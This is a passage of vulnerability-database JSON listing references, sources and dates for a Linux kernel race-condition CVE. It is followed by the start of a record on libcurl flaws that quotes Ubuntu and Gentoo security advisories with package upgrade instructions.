"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-3573"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-29368"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-20194"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-24586"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-26147"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-31916"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-26141"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-3348"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-28950"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-24588"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-26140"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-31440"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-26146"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-29646"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-29155"
},
{
"trust": 0.3,
"url": "https://listman.redhat.com/mailman/listinfo/rhsa-announce"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-3732"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-0129"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-3489"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-24503"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/team/contact/"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-29660"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-24587"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-26139"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/updates/classification/#moderate"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-28971"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-24502"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-24503"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-3659"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-3564"
},
{
"trust": 0.3,
"url": "https://bugzilla.redhat.com/):"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2020-0427"
},
{
"trust": 0.3,
"url": "https://access.redhat.com/security/cve/cve-2021-23133"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-24502"
},
{
"trust": 0.3,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3543"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/articles/11258"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-26144"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-24504"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-20239"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-20194"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-0129"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-28950"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/8/html/8.5_release_notes/"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-26143"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-29368"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-29155"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/team/key/"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-26140"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-36386"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-29660"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-28971"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-36158"
},
{
"trust": 0.2,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-26146"
},
{
"trust": 0.2,
"url": "https://access.redhat.com/security/cve/cve-2020-27777"
},
{
"trust": 0.2,
"url": "https://ubuntu.com/security/notices/usn-4997-1"
},
{
"trust": 0.2,
"url": "https://ubuntu.com/security/notices/usn-5000-1"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/362.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "http://seclists.org/oss-sec/2021/q2/110"
},
{
"trust": 0.1,
"url": "https://security.archlinux.org/cve-2021-23133"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2021:4140"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2021:4356"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-27777"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-oracle/5.11.0-1010.10"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-aws/5.11.0-1011.11"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-raspi/5.11.0-1012.13"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-gcp/5.11.0-1011.12"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-azure/5.11.0-1009.9"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux/5.11.0-22.23"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-oracle-5.8/5.8.0-1033.34~20.04.1"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-azure-5.8/5.8.0-1036.38~20.04.1"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-25670"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-raspi/5.8.0-1029.32"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-gcp/5.8.0-1035.37"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux/5.8.0-59.66"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-25671"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-aws/5.8.0-1038.40"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-azure/5.8.0-1036.38"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-25673"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-hwe-5.8/5.8.0-59.66~20.04.1"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-kvm/5.8.0-1030.32"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-gcp-5.8/5.8.0-1035.37~20.04.1"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-aws-5.8/5.8.0-1038.40~20.04.1"
},
{
"trust": 0.1,
"url": "https://ubuntu.com/security/notices/usn-4999-1"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-oracle/5.8.0-1033.34"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-gcp/5.4.0-1046.49"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-oracle/5.4.0-1048.52"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-aws-5.4/5.4.0-1051.53~18.04.1"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-azure/5.4.0-1051.53"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-gkeop/5.4.0-1018.19"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-raspi/5.4.0-1038.41"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-gke-5.4/5.4.0-1046.48~18.04.1"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-gkeop-5.4/5.4.0-1018.19~18.04.1"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-hwe-5.4/5.4.0-77.86~18.04.1"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-raspi-5.4/5.4.0-1038.41~18.04.1"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux/5.4.0-77.86"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-aws/5.4.0-1051.53"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-gcp-5.4/5.4.0-1046.49~18.04.1"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-azure-5.4/5.4.0-1051.53~18.04.1"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-oracle-5.4/5.4.0-1048.52~18.04.1"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-gke/5.4.0-1046.48"
},
{
"trust": 0.1,
"url": "https://ubuntu.com/security/notices/usn-5001-1"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-oem-5.10/5.10.0-1033.34"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3600"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-oracle/4.15.0-1075.83"
},
{
"trust": 0.1,
"url": "https://ubuntu.com/security/notices/usn-5003-1"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-gcp-4.15/4.15.0-1103.116"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-dell300x/4.15.0-1022.26"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-aws/4.15.0-1106.113"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-azure-4.15/4.15.0-1118.131"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-raspi2/4.15.0-1089.94"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux/4.15.0-147.151"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-snapdragon/4.15.0-1106.115"
},
{
"trust": 0.1,
"url": "https://ubuntu.com/security/notices/usn-5000-2"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-kvm/5.4.0-1041.42"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-kvm/5.11.0-1009.9"
},
{
"trust": 0.1,
"url": "https://ubuntu.com/security/notices/usn-4997-2"
},
{
"trust": 0.1,
"url": "https://issues.jboss.org/):"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-14155"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-24370"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-35521"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-25014"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-13435"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-35522"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-12762"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-20838"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3426"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-14615"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-17594"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-17594"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-23841"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-17541"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-5827"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3800"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-33574"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-42574"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-19603"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-36332"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-24370"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3572"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-14145"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3445"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-25009"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-25012"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-36331"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3200"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-33033"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-25010"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-20197"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3487"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-22876"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-16135"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-36312"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-13750"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-23840"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-17595"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-10001"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-25009"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-10001"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-36085"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-35448"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-19603"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-20673"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-13750"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-17541"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-20673"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-20231"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-25013"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3580"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-14155"
},
{
"trust": 0.1,
"url": "https://docs.openshift.com/container-platform/4.9/release_notes/ocp-4-9-release-notes.html"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-35524"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-16135"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-13751"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-17595"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-20266"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-27645"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-33194"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-25013"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-22925"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-22898"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-36087"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-13751"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-36330"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-20838"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3778"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-20284"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-31535"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-35942"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-12762"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-25014"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-14615"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3481"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-13435"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-36086"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-14145"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2020-35523"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-28153"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-20232"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-33560"
},
{
"trust": 0.1,
"url": "https://docs.openshift.com/container-platform/4.7/logging/cluster-logging-upgrading.html"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-3796"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2018-25010"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-18218"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2019-5827"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/security/cve/cve-2021-36084"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-18218"
},
{
"trust": 0.1,
"url": "https://access.redhat.com/errata/rhsa-2021:4627"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-25012"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2021-23133"
},
{
"db": "PACKETSTORM",
"id": "164875"
},
{
"db": "PACKETSTORM",
"id": "164837"
},
{
"db": "PACKETSTORM",
"id": "163249"
},
{
"db": "PACKETSTORM",
"id": "163251"
},
{
"db": "PACKETSTORM",
"id": "163253"
},
{
"db": "PACKETSTORM",
"id": "163255"
},
{
"db": "PACKETSTORM",
"id": "163262"
},
{
"db": "PACKETSTORM",
"id": "163291"
},
{
"db": "PACKETSTORM",
"id": "163301"
},
{
"db": "PACKETSTORM",
"id": "164967"
},
{
"db": "CNNVD",
"id": "CNNVD-202104-1348"
},
{
"db": "NVD",
"id": "CVE-2021-23133"
}
]
},
"sources": {
"_id": null,
"data": [
{
"db": "VULMON",
"id": "CVE-2021-23133",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "164875",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "164837",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "163249",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "163251",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "163253",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "163255",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "163262",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "163291",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "163301",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "164967",
"ident": null
},
{
"db": "CNNVD",
"id": "CNNVD-202104-1348",
"ident": null
},
{
"db": "NVD",
"id": "CVE-2021-23133",
"ident": null
}
]
},
"sources_release_date": {
"_id": null,
"data": [
{
"date": "2021-04-22T00:00:00",
"db": "VULMON",
"id": "CVE-2021-23133",
"ident": null
},
{
"date": "2021-11-10T17:10:23",
"db": "PACKETSTORM",
"id": "164875",
"ident": null
},
{
"date": "2021-11-10T17:04:39",
"db": "PACKETSTORM",
"id": "164837",
"ident": null
},
{
"date": "2021-06-23T15:33:13",
"db": "PACKETSTORM",
"id": "163249",
"ident": null
},
{
"date": "2021-06-23T15:35:21",
"db": "PACKETSTORM",
"id": "163251",
"ident": null
},
{
"date": "2021-06-23T15:38:23",
"db": "PACKETSTORM",
"id": "163253",
"ident": null
},
{
"date": "2021-06-23T15:41:26",
"db": "PACKETSTORM",
"id": "163255",
"ident": null
},
{
"date": "2021-06-23T15:48:14",
"db": "PACKETSTORM",
"id": "163262",
"ident": null
},
{
"date": "2021-06-27T12:22:22",
"db": "PACKETSTORM",
"id": "163291",
"ident": null
},
{
"date": "2021-06-28T16:22:26",
"db": "PACKETSTORM",
"id": "163301",
"ident": null
},
{
"date": "2021-11-15T17:25:56",
"db": "PACKETSTORM",
"id": "164967",
"ident": null
},
{
"date": "2021-04-19T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202104-1348",
"ident": null
},
{
"date": "2021-04-22T18:15:08.123000",
"db": "NVD",
"id": "CVE-2021-23133",
"ident": null
}
]
},
"sources_update_date": {
"_id": null,
"data": [
{
"date": "2021-05-10T00:00:00",
"db": "VULMON",
"id": "CVE-2021-23133",
"ident": null
},
{
"date": "2021-12-16T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202104-1348",
"ident": null
},
{
"date": "2024-11-21T05:51:16.080000",
"db": "NVD",
"id": "CVE-2021-23133",
"ident": null
}
]
},
"threat_type": {
"_id": null,
"data": "local",
"sources": [
{
"db": "PACKETSTORM",
"id": "163249"
},
{
"db": "PACKETSTORM",
"id": "163251"
},
{
"db": "PACKETSTORM",
"id": "163253"
},
{
"db": "PACKETSTORM",
"id": "163255"
},
{
"db": "PACKETSTORM",
"id": "163262"
},
{
"db": "PACKETSTORM",
"id": "163291"
},
{
"db": "PACKETSTORM",
"id": "163301"
},
{
"db": "CNNVD",
"id": "CNNVD-202104-1348"
}
],
"trust": 1.3
},
"title": {
"_id": null,
"data": "Linux kernel Competitive conditional vulnerability",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202104-1348"
}
],
"trust": 0.6
},
"type": {
"_id": null,
"data": "arbitrary",
"sources": [
{
"db": "PACKETSTORM",
"id": "163249"
},
{
"db": "PACKETSTORM",
"id": "163251"
},
{
"db": "PACKETSTORM",
"id": "163253"
},
{
"db": "PACKETSTORM",
"id": "163255"
},
{
"db": "PACKETSTORM",
"id": "163262"
},
{
"db": "PACKETSTORM",
"id": "163291"
},
{
"db": "PACKETSTORM",
"id": "163301"
}
],
"trust": 0.7
}
}
VAR-202210-1888
Vulnerability from variot - Updated: 2026-04-10 22:55When doing HTTP(S) transfers, libcurl might erroneously use the read callback (CURLOPT_READFUNCTION) to ask for data to send, even when the CURLOPT_POSTFIELDS option has been set, if the same handle previously was used to issue a PUT request which used that callback. This flaw may surprise the application and cause it to misbehave and either send off the wrong data or use memory after free or similar in the subsequent POST request. The problem exists in the logic for a reused handle when it is changed from a PUT to a POST. (CVE-2022-42915). ==========================================================================
Ubuntu Security Notice USN-5702-1
October 26, 2022
curl vulnerabilities
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 22.10
- Ubuntu 22.04 LTS
- Ubuntu 20.04 LTS
- Ubuntu 18.04 LTS
Summary:
Several security issues were fixed in curl.
Software Description: - curl: HTTP, HTTPS, and FTP client and client libraries
Details:
Robby Simpson discovered that curl incorrectly handled certain POST operations after PUT operations. (CVE-2022-32221)
Hiroki Kurosawa discovered that curl incorrectly handled parsing .netrc files. If an attacker were able to provide a specially crafted .netrc file, this issue could cause curl to crash, resulting in a denial of service. This issue only affected Ubuntu 22.10. (CVE-2022-35260)
It was discovered that curl incorrectly handled certain HTTP proxy return codes. A remote attacker could use this issue to cause curl to crash, resulting in a denial of service, or possibly execute arbitrary code. This issue only affected Ubuntu 22.04 LTS, and Ubuntu 22.10. (CVE-2022-42915)
Hiroki Kurosawa discovered that curl incorrectly handled HSTS support when certain hostnames included IDN characters. A remote attacker could possibly use this issue to cause curl to use unencrypted connections. This issue only affected Ubuntu 22.04 LTS, and Ubuntu 22.10. (CVE-2022-42916)
Update instructions:
The problem can be corrected by updating your system to the following package versions:
Ubuntu 22.10: curl 7.85.0-1ubuntu0.1 libcurl3-gnutls 7.85.0-1ubuntu0.1 libcurl3-nss 7.85.0-1ubuntu0.1 libcurl4 7.85.0-1ubuntu0.1
Ubuntu 22.04 LTS: curl 7.81.0-1ubuntu1.6 libcurl3-gnutls 7.81.0-1ubuntu1.6 libcurl3-nss 7.81.0-1ubuntu1.6 libcurl4 7.81.0-1ubuntu1.6
Ubuntu 20.04 LTS: curl 7.68.0-1ubuntu2.14 libcurl3-gnutls 7.68.0-1ubuntu2.14 libcurl3-nss 7.68.0-1ubuntu2.14 libcurl4 7.68.0-1ubuntu2.14
Ubuntu 18.04 LTS: curl 7.58.0-2ubuntu3.21 libcurl3-gnutls 7.58.0-2ubuntu3.21 libcurl3-nss 7.58.0-2ubuntu3.21 libcurl4 7.58.0-2ubuntu3.21
In general, a standard system update will make all the necessary changes. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 202212-01
https://security.gentoo.org/
Severity: High Title: curl: Multiple Vulnerabilities Date: December 19, 2022 Bugs: #803308, #813270, #841302, #843824, #854708, #867679, #878365 ID: 202212-01
Synopsis
Multiple vulnerabilities have been found in curl, the worst of which could result in arbitrary code execution.
Background
A command line tool and library for transferring data with URLs.
Affected packages
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 net-misc/curl < 7.86.0 >= 7.86.0
Description
Multiple vulnerabilities have been discovered in curl. Please review the CVE identifiers referenced below for details.
Impact
Please review the referenced CVE identifiers for details.
Workaround
There is no known workaround at this time.
Resolution
All curl users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot --verbose ">=net-misc/curl-7.86.0"
References
[ 1 ] CVE-2021-22922 https://nvd.nist.gov/vuln/detail/CVE-2021-22922 [ 2 ] CVE-2021-22923 https://nvd.nist.gov/vuln/detail/CVE-2021-22923 [ 3 ] CVE-2021-22925 https://nvd.nist.gov/vuln/detail/CVE-2021-22925 [ 4 ] CVE-2021-22926 https://nvd.nist.gov/vuln/detail/CVE-2021-22926 [ 5 ] CVE-2021-22945 https://nvd.nist.gov/vuln/detail/CVE-2021-22945 [ 6 ] CVE-2021-22946 https://nvd.nist.gov/vuln/detail/CVE-2021-22946 [ 7 ] CVE-2021-22947 https://nvd.nist.gov/vuln/detail/CVE-2021-22947 [ 8 ] CVE-2022-22576 https://nvd.nist.gov/vuln/detail/CVE-2022-22576 [ 9 ] CVE-2022-27774 https://nvd.nist.gov/vuln/detail/CVE-2022-27774 [ 10 ] CVE-2022-27775 https://nvd.nist.gov/vuln/detail/CVE-2022-27775 [ 11 ] CVE-2022-27776 https://nvd.nist.gov/vuln/detail/CVE-2022-27776 [ 12 ] CVE-2022-27779 https://nvd.nist.gov/vuln/detail/CVE-2022-27779 [ 13 ] CVE-2022-27780 https://nvd.nist.gov/vuln/detail/CVE-2022-27780 [ 14 ] CVE-2022-27781 https://nvd.nist.gov/vuln/detail/CVE-2022-27781 [ 15 ] CVE-2022-27782 https://nvd.nist.gov/vuln/detail/CVE-2022-27782 [ 16 ] CVE-2022-30115 https://nvd.nist.gov/vuln/detail/CVE-2022-30115 [ 17 ] CVE-2022-32205 https://nvd.nist.gov/vuln/detail/CVE-2022-32205 [ 18 ] CVE-2022-32206 https://nvd.nist.gov/vuln/detail/CVE-2022-32206 [ 19 ] CVE-2022-32207 https://nvd.nist.gov/vuln/detail/CVE-2022-32207 [ 20 ] CVE-2022-32208 https://nvd.nist.gov/vuln/detail/CVE-2022-32208 [ 21 ] CVE-2022-32221 https://nvd.nist.gov/vuln/detail/CVE-2022-32221 [ 22 ] CVE-2022-35252 https://nvd.nist.gov/vuln/detail/CVE-2022-35252 [ 23 ] CVE-2022-35260 https://nvd.nist.gov/vuln/detail/CVE-2022-35260 [ 24 ] CVE-2022-42915 https://nvd.nist.gov/vuln/detail/CVE-2022-42915 [ 25 ] CVE-2022-42916 https://nvd.nist.gov/vuln/detail/CVE-2022-42916
Availability
This GLSA and any updates to it are available for viewing at the Gentoo Security Website:
https://security.gentoo.org/glsa/202212-01
Concerns?
